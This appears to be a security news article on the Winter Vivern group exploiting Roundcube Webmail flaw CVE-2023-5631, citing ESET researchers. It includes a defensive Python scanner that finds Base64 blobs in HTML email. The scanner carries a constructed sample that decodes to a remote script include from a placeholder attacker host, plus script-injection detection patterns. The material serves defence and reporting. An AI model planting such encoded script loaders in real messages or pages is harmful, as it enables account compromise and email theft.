Winter Vivern Targets Roundcube’s Zero-Day Vulnerability

CVE-2023-5631
Malicious email message

The threat actor known as Winter Vivern was observed exploiting a zero-day vulnerability in the Roundcube Webmail software. These attacks were first detected on October 11th of this year, and the attackers’ primary objective was the theft of emails from the victims’ accounts.

Researchers from ESET, who discovered the attacks, reported a resurgence in Winter Vivern’s activity. They noted that the group had previously exploited other known vulnerabilities in Roundcube and Zimbra.

Over recent months, the group has been linked to attacks against Ukraine and Poland, as well as government institutions across Europe and India.


The new vulnerability, disclosed by ESET, is tracked as CVE-2023-5631 and has a CVSS score of 5.4. It allows remote attackers to load arbitrary JavaScript code in the victim’s browser. A patch was released on October 14th of the same year.

Winter Vivern’s attack chains begin with a phishing message whose HTML source carries a Base64-encoded payload. Once decoded, that payload exploits the cross-site scripting (XSS) vulnerability to inject JavaScript that is loaded from a remote server.
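As an added illustration of the defensive side of the chain just described (this is example code written for this article, not ESET’s tooling or Roundcube code), the following Python scanner looks through an HTML email body for long Base64 runs, decodes them, and flags any that decode to script-bearing markup such as a `<script>` tag, an inline event handler, a `javascript:` URI, or a remote `src=` loader. The email body, the Base64 blob and the host `attacker.invalid` are all constructed for the example and are not indicators from the actual campaign.

```python
import base64
import binascii
import re

# Constructed sample: a benign-looking HTML email that hides a Base64 blob which
# decodes to a remote <script> include. The host is a placeholder, not a real IoC.
SAMPLE_BLOB = base64.b64encode(
    b'<script src="https://attacker.invalid/payload.js"></script>'
).decode()
SAMPLE_EMAIL_HTML = f"""<html><body>
<p>Please review the attached report.</p>
<div data-x="{SAMPLE_BLOB}"></div>
</body></html>"""

# Constructed clean message for comparison.
CLEAN_EMAIL_HTML = "<html><body><p>Meeting at 10.</p></body></html>"

# A candidate Base64 run: at least 24 characters of the Base64 alphabet plus optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicators inside a decoded blob that a defender treats as script injection.
SCRIPT_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "remote_src": re.compile(r"\bsrc\s*=\s*['\"]?https?://", re.I),
}


def decode_candidates(html_body):
    """Return (blob, decoded_text) pairs for every Base64 run that decodes cleanly."""
    out = []
    for match in B64_RUN.finditer(html_body):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob, validate=True)
        except (ValueError, binascii.Error):
            # Not valid Base64 (bad length or padding): skip it.
            continue
        out.append((blob, raw.decode("utf-8", errors="replace")))
    return out


def find_encoded_script(html_body):
    """Flag Base64 blobs whose decoded content carries script-injection markers.

    Returns a list of findings; an empty list means nothing suspicious was found.
    """
    findings = []
    for blob, text in decode_candidates(html_body):
        hits = [name for name, pattern in SCRIPT_INDICATORS.items() if pattern.search(text)]
        if hits:
            findings.append({
                "blob_prefix": blob[:32],
                "decoded": text,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_EMAIL_HTML), ("clean", CLEAN_EMAIL_HTML)):
        for finding in find_encoded_script(body):
            print(f"[{label}] indicators={finding['indicators']} decoded={finding['decoded']!r}")
```

A scanner like this is a triage aid at the mail gateway, not a substitute for the fix: the blob is only dangerous because the webmail client renders it unsanitized, so patching Roundcube and serving it with a restrictive Content-Security-Policy remain the controls that actually close the hole.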

Matthieu Faou, a researcher at ESET, explained, “By sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is required.

Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities,” emphasized Faou.